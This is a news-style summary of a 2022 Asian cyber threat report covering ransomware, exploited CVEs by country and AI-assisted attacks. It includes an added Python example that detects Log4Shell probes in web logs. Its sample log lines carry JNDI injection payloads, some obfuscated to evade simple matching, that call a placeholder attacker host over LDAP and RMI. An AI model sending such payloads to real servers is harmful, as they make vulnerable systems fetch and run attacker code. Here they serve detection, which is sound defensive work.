A cybersecurity firm's 2022 user base data from five countries in the region shows a need for stronger oversight of AI ethics frameworks.
According to a cybersecurity firm's Cyber Threat Landscape report for 2022, which covers threats affecting Singapore, Malaysia, Indonesia, South Korea, and Hong Kong, ransomware and wiperware continued to evolve and proliferate as cyber weapon platforms.
Going by the firm's own user base data, the year also saw the continued impact of cyber supply chain compromise: widely deployed components that were vulnerable led to the compromise of several big-name victim companies, commonly ending in ransomware or the sale of breached data.
Threat actors also exploited IoT devices, mobile devices, applications and operational technology last year. In addition, the Ransomware-as-a-Service model saw a shift in the number of attacks targeting small and medium-sized enterprises (SMEs), many of which could be essential service providers.
Other findings
Regionally, according to the firm’s user base data, activities by state-sponsored and organized threat groups originating from China had eclipsed those of state-sponsored groups operating from Russia and North Korea. Also:
- Generative AI was a double-edged sword. The data showed threat actors exploiting it to create convincing phishing content with 10–15% higher click-through rates, to develop malware faster, and to circumvent authentication and identity verification by synthetically generating imagery and voice.
- Cyber defenders were also leveraging generative AI and other forms of AI to accelerate the resolution of low-level cyberattacks, freeing them to focus on more complex issues.
- Regional threats and trends:
  - Indonesia: The top two exploited vulnerabilities in the firm's user base were CVE-2017-0199 (arbitrary code execution in Microsoft Office 2007 to 2016, Windows Vista SP2 to Windows 8.1 and Windows Server 2008 SP2) and CVE-2006-1540 (denial of service and arbitrary code execution in Microsoft Office 2000 to 2003). The Government, Financial Services and Insurance (FSI), and Commercial industry groups were the most targeted. The Commercial group was hit particularly hard by a series of cyberattacks by the Desorden threat group. Many of these were organized crime data breaches and ransomware attacks, notably against SMEs in the cyber supply chain, which led to the incidents that made the news.
  - Hong Kong: The firm's users in the SAR saw sustained cyberattacks from the menuPass and Operation Dragon Castling threat groups, a state-sponsored group and an organized crime group respectively, both associated with China. Hong Kong is an emerging hub for cryptocurrency exchanges, and cryptocurrencies are attractive to financially motivated threat groups, which target weaknesses in exchange infrastructure and wallets to steal funds or to support money laundering.
  - Malaysia: The most exploited vulnerabilities were largely consistent with the top vulnerabilities seen in the firm's data for 2021 and 2013. This may indicate that threat actors were using Malaysia's digital attack surface to test vulnerabilities before using them at scale in more mature territories. Continued, focused exploitation attempts against CVE-2021-44228, the Apache Log4j arbitrary code execution vulnerability, indicate that threat actors were still seeing a higher return on investment from it, and that organizations in Malaysia are still catching up on patching vulnerabilities that are now more than a year old.
  - Singapore: The most exploited vulnerabilities were not necessarily the latest published vulnerabilities or zero-day exploits but vulnerabilities dating back as far as 2006. This indicates that threat actors still expected to find old, unpatched vulnerabilities offering a higher return on investment, and points to poor cyber hygiene in victim organizations. The avoidance of more current vulnerabilities may reflect an assumption that patch management cadences are generally higher in Singapore than in the rest of the region because of compliance and regulation. The Healthcare and Transport industries rose into the top targeted industries, together with the Oil and Gas sector.
  - South Korea: The country saw sustained cyberattacks from North Korea-based threat groups. In 2022, Roaming Mantis began compromising domestic Wi-Fi routers and Android smartphone users to create opportunities for surveillance and data exfiltration. Kimsuky and Lazarus Group were material threat groups demonstrating the three elements of intent, capability and opportunity. Kimsuky and its affiliate, Lazarus Group, are known to target South Korea and have been observed leveraging domestic software vulnerabilities, phishing campaigns and ransomware to compromise their victims. Exploitation of CVE-2021-44228, the Apache Log4j arbitrary code execution vulnerability, indicates that threat actors were still seeing some utility and return on investment from it in South Korea. Old vulnerabilities in Microsoft productivity software and operating systems were also targeted.
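The Malaysia and South Korea findings above both note continued exploitation attempts against CVE-2021-44228 a year after disclosure. The following is an added example, not code from the report or from Ensign InfoSecurity, of the kind of check a defender can run over web server access logs to spot those attempts: it URL-decodes each line, collapses the Log4j lookup obfuscations commonly used to evade naive `${jndi:` matching (`${lower:j}`, `${::-j}` and similar), and extracts the callback host. The log lines are constructed for the example; the IP addresses are documentation ranges and do not refer to any real infrastructure.

```python
"""Spot CVE-2021-44228 (Log4Shell) probe attempts in web access logs (added example)."""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the report). The first three carry
# JNDI lookup probes in forms seen in scanning traffic; the last line is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Nov/2022:10:01:02 +0800] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.9 - - [12/Nov/2022:10:03:44 +0800] "GET /login?user=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.85"
203.0.113.9 - - [12/Nov/2022:10:04:10 +0800] "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/o}" "Mozilla/5.0"
198.51.100.20 - - [12/Nov/2022:10:05:00 +0800] "GET /static/app.js HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
"""

# Log4j lookup obfuscations, reduced innermost-first:
#   ${lower:j} / ${upper:j}   -> j
#   ${::-j} / ${env:NOPE:-j}  -> j   (the ":-default" syntax yields the default value)
_CASE_WRAP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_DEFAULT_WRAP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# Final signature once obfuscation is stripped: ${jndi:<scheme>://<host[:port]>
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.I)
_SRC_IP = re.compile(r"^(\S+)")


def normalize(payload: str) -> str:
    """URL-decode (twice, for double-encoded scanners) and collapse nested lookups
    until the string stops changing."""
    s = unquote(unquote(payload))
    while True:
        new = _CASE_WRAP.sub(lambda m: m.group(1).lower(), s)
        new = _DEFAULT_WRAP.sub(lambda m: m.group(1), new)
        if new == s:
            return s
        s = new


def scan_log(text: str) -> list[dict]:
    """Return one finding per log line carrying a JNDI lookup, with source IP,
    lookup scheme and the attacker-controlled callback host."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = _JNDI.search(normalize(line))
        if m:
            findings.append({
                "line": n,
                "src": _SRC_IP.match(line).group(1),
                "scheme": m.group(1).lower(),
                "callback": m.group(2),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['src']} -> {f['scheme']}://{f['callback']}")
```

Each callback host is a candidate indicator to block at the egress firewall and to search for in outbound LDAP/RMI connection logs, since a real hit is followed by the vulnerable JVM reaching out to it. Matching only the literal `${jndi:` string would miss two of the three constructed probes, which is why the normalizer runs first.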
According to Lim Minhan, Head of Consulting, Ensign InfoSecurity, the firm that released the cyber threat report: “While threat actors are rapidly advancing and becoming highly sophisticated in their techniques, we have observed an overall lack of cybersecurity awareness across organizations in Asia. With AI-powered attacks generating new pathways, (there was) a drastic uptick in threats across the territories featured in our report. Policy and regulation, along with a strong ethical framework for AI, will go a long way in casting a security net for nations at large, and organizations in particular.”